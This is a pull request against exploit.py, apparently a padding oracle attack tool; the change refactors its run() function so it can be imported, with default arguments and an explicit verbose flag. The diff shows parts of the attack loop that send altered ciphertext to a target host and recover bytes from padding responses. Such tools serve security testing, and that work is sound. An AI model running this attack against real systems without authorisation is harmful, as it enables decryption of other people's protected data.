### PR TITLE
modified run.py so that it can be imported into another file

### DIFF
--- a/exploit.py
+++ b/exploit.py
@@ -93,7 +93,7 @@ def hex_xor(s1, s2):
     return b.hex()
 
 
-def run(cipher, size_block, host, url, cookie, method, post, error):
+def run(cipher, size_block, host, url, error, cookie='', method='GET', post='', verbose=False):
     cipher = cipher.upper()
     found = False
     valide_value = []
@@ -134,7 +134,7 @@ def run(cipher, size_block, host, url, cookie, method, post, error):
                         host, cookie, url, post, method, up_cipher
                     )
 
-                    if args.verbose == True:
+                    if verbose == True:
                         exe = re.findall("..", cb)
                         discover = ("").join(exe[size_block - i : size_block])
                         current = ("").join(exe[size_block - i - 1 : size_block - i])
@@ -155,7 +155,7 @@ def run(cipher, size_block, host, url, cookie, method, post, error):
                         value = re.findall("..", bk)
                         valide_value.insert(0, value[size_block - (i + 1)])
 
-                        if args.verbose == True:
+                        if verbose == True:
                             print("")
                             print("[+] HTTP ", response.status, response.reason)
                             print("[+] Block M_Byte : %s" % bk)
@@ -189,7 +189,7 @@ def run(cipher, size_block, host, url, cookie, method, post, error):
                 if len(cipher_block) - 1 == block and i == 0:
                     value = re.findall("..", bk)
                     valide_value.insert(0, "01")
-                    if args.verbose == True:
+                    if verbose == True:
                         print("")
                         print(
                             "[-] No padding found, but maybe the padding is length 01 :)"
@@ -267,8 +267,9 @@ if __name__ == "__main__":
         args.length_block_cipher,
         args.host,
         args.urltarget,
+        args.error,
         args.cookie,
         args.method,
         args.post,
-        args.error,
+        args.verbose,
     )


### PR DESCRIPTION
run.py will throw `NameError:` name 'args' is not defined` if it is imported and ran from another file, which i fixed. 

I also added default arguments for `cookie`, `method`, `post`, and `verbose` to prevent a `TypeError` from being thrown.